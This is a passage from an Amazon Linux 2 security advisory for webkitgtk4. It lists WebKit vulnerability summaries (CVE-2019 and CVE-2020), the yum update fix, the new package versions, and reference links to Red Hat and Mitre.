in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8669)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8671)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8672)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8673)\n\nA logic issue was addressed with improved state management. This issue is fixed in iOS 13, Safari 13. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8674)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8676)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8677)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8678)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8679)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8680)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8681)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8683)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8684)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8686)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8687)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8688)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, watchOS 5.3, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8689)\n\nA logic issue existed in the handling of document loads. This issue was addressed with improved state management. This issue is fixed in iOS 12.4, macOS Mojave 10.14.6, tvOS 12.4, Safari 12.1.2, iTunes for Windows 12.9.6, iCloud for Windows 7.13, iCloud for Windows 10.6. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8690)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8707)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8710)\n\nA logic issue was addressed with improved state management. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8719)\n\nThis fixes a remote code execution in webkitgtk4. No further details are available in NIST. (CVE-2019-8720)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8726)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8733)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8735)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8743)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.1 and iPadOS 13.1, tvOS 13, Safari 13.0.1, iTunes for Windows 12.10.1, iCloud for Windows 10.7, iCloud for Windows 7.14. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8763)\n\nA logic issue was addressed with improved state management. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8764)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8765)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in watchOS 6.1, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8766)\n\n\"Clear History and Website Data\" did not clear the history. The issue was addressed with improved data deletion. This issue is fixed in macOS Catalina 10.15. A user may be unable to delete browsing history items. (CVE-2019-8768)\n\nAn issue existed in the drawing of web page elements. The issue was addressed with improved logic. This issue is fixed in iOS 13.1 and iPadOS 13.1, macOS Catalina 10.15. Visiting a maliciously crafted website may reveal browsing history. (CVE-2019-8769)\n\nThis issue was addressed with improved iframe sandbox enforcement. This issue is fixed in Safari 13.0.1, iOS 13. Maliciously crafted web content may violate iframe sandboxing policy. (CVE-2019-8771)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8782)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8783)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8808)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8811)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8812)\n\nA logic issue was addressed with improved state management. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2019-8813)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8814)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8815)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8816)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8819)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, watchOS 6.1, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8820)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8821)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8822)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.2 and iPadOS 13.2, tvOS 13.2, Safari 13.0.3, iTunes for Windows 12.10.2, iCloud for Windows 11.0, iCloud for Windows 7.15. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8823)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8835)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in tvOS 13.3, watchOS 6.1.1, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8844)\n\nA use after free issue was addressed with improved memory management. This issue is fixed in tvOS 13.3, iCloud for Windows 10.9, iOS 13.3 and iPadOS 13.3, Safari 13.0.4, iTunes 12.10.3 for Windows, iCloud for Windows 7.16. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2019-8846)\n\nWebKitGTK through 2.26.4 and WPE WebKit through 2.26.4 (which are the versions right before 2.28.0) contains a memory corruption issue (use-after-free) that may lead to arbitrary code execution. This issue has been fixed in 2.28.0 with improved memory handling. (CVE-2020-10018)\n\nA use-after-free flaw exists in WebKitGTK. This flaw allows remote attackers to execute arbitrary code or cause a denial of service. (CVE-2020-11793)\n\nA denial of service issue was addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. A malicious website may be able to cause a denial of service. (CVE-2020-3862)\n\nA logic issue was addressed with improved validation. This issue is fixed in iCloud for Windows 7.17, iTunes 12.10.4 for Windows, iCloud for Windows 10.9.2, tvOS 13.3.1, Safari 13.0.5, iOS 13.3.1 and iPadOS 13.3.1. A DOM object context may not have had a unique security origin. (CVE-2020-3864)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2020-3865)\n\nA logic issue was addressed with improved state management. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to universal cross site scripting. (CVE-2020-3867)\n\nMultiple memory corruption issues were addressed with improved memory handling. This issue is fixed in iOS 13.3.1 and iPadOS 13.3.1, tvOS 13.3.1, Safari 13.0.5, iTunes for Windows 12.10.4, iCloud for Windows 11.0, iCloud for Windows 7.17. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2020-3868)\n\nA logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A file URL may be incorrectly processed. (CVE-2020-3885)\n\nA race condition was addressed with additional validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. An application may be able to read restricted memory. (CVE-2020-3894)\n\nA memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2020-3895)\n\nA type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3897)\n\nA memory consumption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. A remote attacker may be able to cause arbitrary code execution. (CVE-2020-3899)\n\nA memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2020-3900)\n\nA type confusion issue was addressed with improved memory handling. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, watchOS 6.2, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2020-3901)\n\nAn input validation issue was addressed with improved input validation. This issue is fixed in iOS 13.4 and iPadOS 13.4, tvOS 13.4, Safari 13.1, iTunes for Windows 12.10.5, iCloud for Windows 10.9.3, iCloud for Windows 7.18. Processing maliciously crafted web content may lead to a cross site scripting attack. (CVE-2020-3902)\n\n \n**Affected Packages:** \n\n\nwebkitgtk4\n\n \n**Note:**\n\nThis advisory is applicable to Amazon Linux 2 (AL2) Core repository. Visit this [FAQ section](<../../faqs.html#clarify-al2-advisories>) for the difference between AL2 Core and AL2 Extras advisories. \n\n \n**Issue Correction:** \nRun _yum update webkitgtk4_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n \u00a0\u00a0\u00a0 webkitgtk4-2.28.2-2.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-devel-2.28.2-2.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-2.28.2-2.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-devel-2.28.2-2.amzn2.0.1.aarch64 \n \u00a0\u00a0\u00a0 webkitgtk4-debuginfo-2.28.2-2.amzn2.0.1.aarch64 \n \n i686: \n \u00a0\u00a0\u00a0 webkitgtk4-2.28.2-2.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-devel-2.28.2-2.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-2.28.2-2.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-devel-2.28.2-2.amzn2.0.1.i686 \n \u00a0\u00a0\u00a0 webkitgtk4-debuginfo-2.28.2-2.amzn2.0.1.i686 \n \n noarch: \n \u00a0\u00a0\u00a0 webkitgtk4-doc-2.28.2-2.amzn2.0.1.noarch \n \n src: \n \u00a0\u00a0\u00a0 webkitgtk4-2.28.2-2.amzn2.0.1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 webkitgtk4-2.28.2-2.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-devel-2.28.2-2.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-2.28.2-2.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-jsc-devel-2.28.2-2.amzn2.0.1.x86_64 \n \u00a0\u00a0\u00a0 webkitgtk4-debuginfo-2.28.2-2.amzn2.0.1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2019-11070](<https://access.redhat.com/security/cve/CVE-2019-11070>), [CVE-2019-6237](<https://access.redhat.com/security/cve/CVE-2019-6237>), [CVE-2019-6251](<https://access.redhat.com/security/cve/CVE-2019-6251>), [CVE-2019-8506](<https://access.redhat.com/security/cve/CVE-2019-8506>), [CVE-2019-8524](<https://access.redhat.com/security/cve/CVE-2019-8524>), [CVE-2019-8535](<https://access.redhat.com/security/cve/CVE-2019-8535>), [CVE-2019-8536](<https://access.redhat.com/security/cve/CVE-2019-8536>), [CVE-2019-8544](<https://access.redhat.com/security/cve/CVE-2019-8544>), [CVE-2019-8551](<https://access.redhat.com/security/cve/CVE-2019-8551>), [CVE-2019-8558](<https://access.redhat.com/security/cve/CVE-2019-8558>), [CVE-2019-8559](<https://access.redhat.com/security/cve/CVE-2019-8559>), [CVE-2019-8563](<https://access.redhat.com/security/cve/CVE-2019-8563>), [CVE-2019-8571](<https://access.redhat.com/security/cve/CVE-2019-8571>), [CVE-2019-8583](<https://access.redhat.com/security/cve/CVE-2019-8583>), [CVE-2019-8584](<https://access.redhat.com/security/cve/CVE-2019-8584>), [CVE-2019-8586](<https://access.redhat.com/security/cve/CVE-2019-8586>), [CVE-2019-8587](<https://access.redhat.com/security/cve/CVE-2019-8587>), [CVE-2019-8594](<https://access.redhat.com/security/cve/CVE-2019-8594>), [CVE-2019-8595](<https://access.redhat.com/security/cve/CVE-2019-8595>), [CVE-2019-8596](<https://access.redhat.com/security/cve/CVE-2019-8596>), [CVE-2019-8597](<https://access.redhat.com/security/cve/CVE-2019-8597>), [CVE-2019-8601](<https://access.redhat.com/security/cve/CVE-2019-8601>), [CVE-2019-8607](<https://access.redhat.com/security/cve/CVE-2019-8607>), [CVE-2019-8608](<https://access.redhat.com/security/cve/CVE-2019-8608>), [CVE-2019-8609](<https://access.redhat.com/security/cve/CVE-2019-8609>), [CVE-2019-8610](<https://access.redhat.com/security/cve/CVE-2019-8610>), [CVE-2019-8611](<https://access.redhat.com/security/cve/CVE-2019-8611>), [CVE-2019-8615](<https://access.redhat.com/security/cve/CVE-2019-8615>), [CVE-2019-8619](<https://access.redhat.com/security/cve/CVE-2019-8619>), [CVE-2019-8622](<https://access.redhat.com/security/cve/CVE-2019-8622>), [CVE-2019-8623](<https://access.redhat.com/security/cve/CVE-2019-8623>), [CVE-2019-8625](<https://access.redhat.com/security/cve/CVE-2019-8625>), [CVE-2019-8644](<https://access.redhat.com/security/cve/CVE-2019-8644>), [CVE-2019-8649](<https://access.redhat.com/security/cve/CVE-2019-8649>), [CVE-2019-8658](<https://access.redhat.com/security/cve/CVE-2019-8658>), [CVE-2019-8666](<https://access.redhat.com/security/cve/CVE-2019-8666>), [CVE-2019-8669](<https://access.redhat.com/security/cve/CVE-2019-8669>), [CVE-2019-8671](<https://access.redhat.com/security/cve/CVE-2019-8671>), [CVE-2019-8672](<https://access.redhat.com/security/cve/CVE-2019-8672>), [CVE-2019-8673](<https://access.redhat.com/security/cve/CVE-2019-8673>), [CVE-2019-8674](<https://access.redhat.com/security/cve/CVE-2019-8674>), [CVE-2019-8676](<https://access.redhat.com/security/cve/CVE-2019-8676>), [CVE-2019-8677](<https://access.redhat.com/security/cve/CVE-2019-8677>), [CVE-2019-8678](<https://access.redhat.com/security/cve/CVE-2019-8678>), [CVE-2019-8679](<https://access.redhat.com/security/cve/CVE-2019-8679>), [CVE-2019-8680](<https://access.redhat.com/security/cve/CVE-2019-8680>), [CVE-2019-8681](<https://access.redhat.com/security/cve/CVE-2019-8681>), [CVE-2019-8683](<https://access.redhat.com/security/cve/CVE-2019-8683>), [CVE-2019-8684](<https://access.redhat.com/security/cve/CVE-2019-8684>), [CVE-2019-8686](<https://access.redhat.com/security/cve/CVE-2019-8686>), [CVE-2019-8687](<https://access.redhat.com/security/cve/CVE-2019-8687>), [CVE-2019-8688](<https://access.redhat.com/security/cve/CVE-2019-8688>), [CVE-2019-8689](<https://access.redhat.com/security/cve/CVE-2019-8689>), [CVE-2019-8690](<https://access.redhat.com/security/cve/CVE-2019-8690>), [CVE-2019-8707](<https://access.redhat.com/security/cve/CVE-2019-8707>), [CVE-2019-8710](<https://access.redhat.com/security/cve/CVE-2019-8710>), [CVE-2019-8719](<https://access.redhat.com/security/cve/CVE-2019-8719>), [CVE-2019-8720](<https://access.redhat.com/security/cve/CVE-2019-8720>), [CVE-2019-8726](<https://access.redhat.com/security/cve/CVE-2019-8726>), [CVE-2019-8733](<https://access.redhat.com/security/cve/CVE-2019-8733>), [CVE-2019-8735](<https://access.redhat.com/security/cve/CVE-2019-8735>), [CVE-2019-8743](<https://access.redhat.com/security/cve/CVE-2019-8743>), [CVE-2019-8763](<https://access.redhat.com/security/cve/CVE-2019-8763>), [CVE-2019-8764](<https://access.redhat.com/security/cve/CVE-2019-8764>), [CVE-2019-8765](<https://access.redhat.com/security/cve/CVE-2019-8765>), [CVE-2019-8766](<https://access.redhat.com/security/cve/CVE-2019-8766>), [CVE-2019-8768](<https://access.redhat.com/security/cve/CVE-2019-8768>), [CVE-2019-8769](<https://access.redhat.com/security/cve/CVE-2019-8769>), [CVE-2019-8771](<https://access.redhat.com/security/cve/CVE-2019-8771>), [CVE-2019-8782](<https://access.redhat.com/security/cve/CVE-2019-8782>), [CVE-2019-8783](<https://access.redhat.com/security/cve/CVE-2019-8783>), [CVE-2019-8808](<https://access.redhat.com/security/cve/CVE-2019-8808>), [CVE-2019-8811](<https://access.redhat.com/security/cve/CVE-2019-8811>), [CVE-2019-8812](<https://access.redhat.com/security/cve/CVE-2019-8812>), [CVE-2019-8813](<https://access.redhat.com/security/cve/CVE-2019-8813>), [CVE-2019-8814](<https://access.redhat.com/security/cve/CVE-2019-8814>), [CVE-2019-8815](<https://access.redhat.com/security/cve/CVE-2019-8815>), [CVE-2019-8816](<https://access.redhat.com/security/cve/CVE-2019-8816>), [CVE-2019-8819](<https://access.redhat.com/security/cve/CVE-2019-8819>), [CVE-2019-8820](<https://access.redhat.com/security/cve/CVE-2019-8820>), [CVE-2019-8821](<https://access.redhat.com/security/cve/CVE-2019-8821>), [CVE-2019-8822](<https://access.redhat.com/security/cve/CVE-2019-8822>), [CVE-2019-8823](<https://access.redhat.com/security/cve/CVE-2019-8823>), [CVE-2019-8835](<https://access.redhat.com/security/cve/CVE-2019-8835>), [CVE-2019-8844](<https://access.redhat.com/security/cve/CVE-2019-8844>), [CVE-2019-8846](<https://access.redhat.com/security/cve/CVE-2019-8846>), [CVE-2020-10018](<https://access.redhat.com/security/cve/CVE-2020-10018>), [CVE-2020-11793](<https://access.redhat.com/security/cve/CVE-2020-11793>), [CVE-2020-3862](<https://access.redhat.com/security/cve/CVE-2020-3862>), [CVE-2020-3864](<https://access.redhat.com/security/cve/CVE-2020-3864>), [CVE-2020-3865](<https://access.redhat.com/security/cve/CVE-2020-3865>), [CVE-2020-3867](<https://access.redhat.com/security/cve/CVE-2020-3867>), [CVE-2020-3868](<https://access.redhat.com/security/cve/CVE-2020-3868>), [CVE-2020-3885](<https://access.redhat.com/security/cve/CVE-2020-3885>), [CVE-2020-3894](<https://access.redhat.com/security/cve/CVE-2020-3894>), [CVE-2020-3895](<https://access.redhat.com/security/cve/CVE-2020-3895>), [CVE-2020-3897](<https://access.redhat.com/security/cve/CVE-2020-3897>), [CVE-2020-3899](<https://access.redhat.com/security/cve/CVE-2020-3899>), [CVE-2020-3900](<https://access.redhat.com/security/cve/CVE-2020-3900>), [CVE-2020-3901](<https://access.redhat.com/security/cve/CVE-2020-3901>), [CVE-2020-3902](<https://access.redhat.com/security/cve/CVE-2020-3902>)\n\nMitre: [CVE-2019-11070](<https://vulners.com/cve/CVE-2019-11070>), [CVE-2019-6237](<https://vulners.com/cve/CVE-2019-6237>), [CVE-2019-6251](<https://vulners.com/cve/CVE-2019-6251>), [CVE-2019-8506](<https://vulners.com/cve/CVE-2019-8506>), [CVE-2019-8524](<https://vulners.com/cve/CVE-2019-8524>), [CVE-2019-8535](<https://vulners.com/cve/CVE-2019-8535>), [CVE-2019-8536](<https://vulners.com/cve/CVE-2019-8536>), [CVE-2019-8544](<https://vulners.com/cve/CVE-2019-8544>), [CVE-2019-8551](<https://vulners.com/cve/CVE-2019-8551>), [CVE-2019-8558](<https://vulners.com/cve/CVE-2019-8558>), [CVE-2019-8559](<https://vulners.com/cve/CVE-2019-8559>), [CVE-2019-8563](<https://vulners.com/cve/CVE-2019-8563>), [CVE-2019-8571](<https://vulners.com/cve/CVE-2019-8571>), [CVE-2019-8583](<https://vulners.com/cve/CVE-2019-8583>), [CVE-2019-8584](<https://vulners.com/cve/CVE-2019-8584>), [CVE-2019-8586](<https://vulners.com/cve/CVE-2019-8586>), [CVE-2019-8587](<https://vulners.com/cve/CVE-2019-8587>), [CVE-2019-8594](<https://vulners.com/cve/CVE-2019-8594>), [CVE-2019-8595](<https://vulners.com/cve/CVE-2019-8595>), [CVE-2019-8596](<https://vulners.com/cve/CVE-2019-8596>), [CVE-2019-8597](<https://vulners.com/cve/CVE-2019-8597>), [CVE-2019-8601](<https://vulners.com/cve/CVE-2019-8601>), [CVE-2019-8607](<https://vulners.com/cve/CVE-2019-8607>), [CVE-2019-8608](<https://vulners.com/cve/CVE-2019-8608>), [CVE-2019-8609](<https://vulners.com/cve/CVE-2019-8609>), [CVE-2019-8610](<https://vulners.com/cve/CVE-2019-8610>), [CVE-2019-8611](<https://vulners.com/cve/CVE-2019-8611>), [CVE-2019-8615](<https://vulners.com/cve/CVE-2019-8615>), [CVE-2019-8619](<https://vulners.com/cve/CVE-2019-8619>), [CVE-2019-8622](<https://vulners.com/cve/CVE-2019-8622>), [CVE-2019-8623](<https://vulners.com/cve/CVE-2019-8623>), [CVE-2019-8625](<https://vulners.com/cve/CVE-2019-8625>), [CVE-2019-8644](<https://vulners.com/cve/CVE-2019-8644>), [CVE-2019-8649](<https://vulners.com/cve/CVE-2019-8649>), [CVE-2019-8658](<https://vulners.com/cve/CVE-2019-8658>), [CVE-2019-8666](<https://vulners.com/cve/CVE-2019-8666>), 